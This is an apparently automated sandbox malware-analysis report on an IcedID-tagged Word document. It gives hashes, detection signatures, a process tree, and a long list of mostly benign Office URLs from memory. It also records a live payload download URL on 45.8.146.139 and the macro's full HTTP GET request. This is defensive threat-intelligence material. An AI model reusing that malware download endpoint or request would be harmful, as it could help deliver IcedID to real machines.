Windows Analysis Report
cnewton doc 08.11.2022.doc

Overview

General Information

Sample Name: cnewton doc 08.11.2022.doc
Analysis ID: 682599
MD5: ee1d6eb5b07b99e65fc0cb477193c35c
SHA1: 9d4dbf701c8ede93a79036dd5a0316da988a2eeb
SHA256: 23b9a20a59041fc7d484957e49ffa7e0f6dba7dbbec0628a4adb69c2e05863ab
Tags: doc, IcedID
Infos:
Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Machine Learning detection for sample
One or more processes crash
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 1220 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • WerFault.exe (PID: 4088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4160 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 3636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4152 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: cnewton doc 08.11.2022.doc Virustotal: Detection: 21%
Source: cnewton doc 08.11.2022.doc ReversingLabs: Detection: 15%
Source: cnewton doc 08.11.2022.doc Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\RemoteDllLoader\Release-x32\RemoteDllLoader.pdb source: WINWORD.EXE, 00000000.00000000.348321457.000000001496F000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.337697577.0000000014BF0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\MemLoader\Release-x32\MemLoader.pdb source: WINWORD.EXE, 00000000.00000000.348321457.000000001496F000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.337697577.0000000014BF0000.00000040.00000001.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\PROGRA~2\COMMON~1\MICROS~1\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\PROGRA~2\COMMON~1\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7.1\

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\y5A7.tmp.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WerFault.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Section loaded: unknown origin: URLDownloadToFileA
Source: global traffic TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global traffic HTTP traffic detected:
  GET /fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 45.8.146.139
  Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: WINWORD.EXE, 00000000.00000000.319693683.0000000012350000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/
Source: WINWORD.EXE, 00000000.00000000.331890958.000000000DCF2000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.330024190.000000000DAF0000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.319834136.0000000012362000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech)P
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechZQwO
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidi
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://globaldisco.crm.dynamics.comom
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.ppe.windows.net=
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://graph.windows.net
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://graph.windows.net/
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/ent
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comu
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comx
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3das/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1=
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1o
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.com2ElO
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientl
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoret
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookf
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrivec-HO
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediamlr%
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://invites.office.com/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesN_
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://lifecycle.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lifecycle.office.comP
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lifecycle.office.comov
Source: WINWORD.EXE, 00000000.00000000.320784675.000000001252E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.comj
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizeIM
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizewM%M
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://login.windows.local
Source: WINWORD.EXE, 00000000.00000000.306836673.000000000D407000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localtes
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#xdN6
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/2
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize054
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize2hiL
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3khM
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6ziL
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7ehM
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize874
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8e_M
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;BiL
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeAx
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCache
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCz
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeDe
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeGB
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH.4
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeHB
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeM
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN=
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeOh
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizePh
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeRxuN7
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeTz
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeYB
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZM
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeaz&L
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizebe%M
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecomfM6M
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeeB7L
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeg
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek27L
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeox
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeq
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizerdml
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizese
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetenk%M
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizevB&L
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizexM
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~h
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://management.azure.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://management.azure.com/
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com/#
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.action.office.com/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://messaging.action.office.com/setcampaignactionh
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregatorO
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16T
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.office.com/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
